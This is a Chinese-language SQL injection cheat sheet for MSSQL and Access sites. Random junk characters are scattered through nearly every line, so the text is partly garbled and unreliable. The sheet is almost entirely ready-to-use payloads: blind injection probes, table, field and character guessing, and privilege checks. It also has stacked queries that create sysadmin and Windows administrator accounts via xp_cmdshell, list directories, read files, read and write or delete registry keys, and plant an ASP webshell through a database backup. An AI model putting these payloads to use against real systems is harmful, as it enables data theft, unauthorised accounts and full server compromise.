1.判断是否有注入;and 1=1 ;and 1=2 ^ po@U"
2.初步判断是否是mssql ;and user>0 "%-Vrb=:Y
-R`{]7V
3.注入参数是字符'and [查询条件] and ''=' <g[z jV9p
%nZl`<M
4.搜索时没过滤参数的'and [查询条件] and '%25'=' Z?axrGmg0
hS]w
A"\87
5.判断数据库系统 vi,hWz8WB
Y?0/f[Ax,y
;and (select count(*) from sysobjects)>0 mssql $coO~qvU
1 R5pf
;and (select count(*) from msysobjects)>0 access ZwmucY%3
j_Szw
w-
NQ9v[gv
AcH-TIgM/
6.猜数据库 ;and (select Count(*) from [数据库名])>0 H9cPtP~a)
[^5\Ww
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 ks4`h>i
L|=5jn9 :
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 $T'!??|IF
6Z2 ,:j;
9.(1)猜字段的ascii值(access) 0t <nH%N}^
$83B10OQ&L
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 `3+i.wR
g68p9#G
(2)猜字段的ascii值(mssql) ++0)KSvw
%M(RV_R+6
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 c3vb~l)
"s+4!, k
10.测试权限结构(mssql) r"7n2
;P@]7vkff
b9.M'P\
>Fel) a
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- </h^%mnd
$]v}X},,
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- ^J'_CA
;5[KZ8j6Y
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- 8H!QekQZ]\
F!omkN
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- `9~
%6N?7#
"/W[gP[y%
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- 3N7H7(IR
uDF;_bli)H
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- Fhoyji4
AU{"G
;and 1=(select IS_MEMBER('db_owner'));-- fr@F7s5}
7},A.q
=CX1jrLZ
)BP*|URc
11.添加mssql和系统的帐户 K@D\5s|1|
mDB
;exec master.dbo.sp_addlogin username;-- V>Wk\'h
;exec master.dbo.sp_password null,username,password;-- \/a6h
r* *zjv>
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- M^FY6TT4O
c`;\sW-_W
;exec master.dbo.xp_cmdshell 'net user username password "W|A^@r}
n<I{x^!
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- rwm^{Qa
IPiV_c-l
;exec master.dbo.xp_cmdshell 'net user username password /add';-- cnv>&6a)
ZO0 Ee1/
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- :GHv3hn5
\o9 \ikR
)9QtnM
"t@p9>
12.(1)遍历目录 9Em#Ela
r"h;JC/&<T
;create table dirs(paths varchar(100), id int) ).k DY?s
@-N` W9
;insert dirs exec master.dbo.xp_dirtree 'c:\' TJ|Jv8j<s
I2cz:U7
;and (select top 1 paths from dirs)>0 2-&EkF4p'
.KsR48g8
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) B/?
L$m
Vz{+3vfra6
?6#won
sDY~jP[Oa
(2)遍历目录 IK~&`n](>
?$ r`T]>`2
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- 0XHQ5+"8
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 M6Fo.eeK3
E-e(K8R
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 U84W(X
P]E-Wp'p
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 5j%G7.S\
6 SSDc/
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 f8
d
3ZK
AOf4y&B>q
jG5HW*>k0
nB[-KS
13.mssql中的存储过程 ~(5r+Z}*`
*{o7G a
xp_regenumvalues 注册表根键, 子键 0D X_*f
GK(CuwJe
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 U)S=JT~h
:!ya&o
xp_regread 根键,子键,键值名 2Xb,
i
6%D9;-N)
;exec xp_regread )G? qX.D
d_RgKdR )k
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 >t D=t8
aQkOQy
xp_regwrite 根键,子键, 值名, 值类型, 值 IgT`on3Y
&4#Zi.]
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 bp1AN9~
.8hI
ad
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 2hE(h
C*9X;+S0J
xp_regdeletevalue 根键,子键,值名 1I+9?fa
FhE{khc#
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 1v o)]ff
azcPeAe
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 <N<Q9}`V
+Y\:Q<eMFg
I7f ^2
L74Mz]v
14.mssql的backup创建webshell _GOSqu!3Y
J
3!~e+wn
use model IG-\&
N^^0j,
create table cmd(str image); X1L@
G
K%^n.
insert into cmd(str) values (''); Rx%S<i;9
^5mc$~1`
backup database model to disk='c:\l.asp'; L9x-90'q,
v
gN!9
n,la<N]
Bq0 \T
0,
15.mssql内置函数 /--p#G h'
t6+m` Kq
;and (select @@version)>0 获得Windows的版本号 gk ]QR.
\-<BUG]=
;and user_name()='dbo' 判断当前系统的连接用户是不是sa c:[k+_Zr
V+d_1]
l
;and (select user_name())>0 爆当前系统的连接用户 "fFSZ@,r
{(73*-~$
;and (select db_name())>0 得到当前连接的数据库 }5 o?7}?
FLZ9pb[T
]rcF/uQJ<n
'\Xkvi
16.简洁的webshell EM,C
_ k-_&PR
use model "kg`TJf=
7#8Gn=g
create table cmd(str image); Z`Yt~{,Q
pwUXM?$R
insert into cmd(str) values (''); eH&F gmU
`-NK:;^
backup database model to disk='g:\wwwtest\l.asp';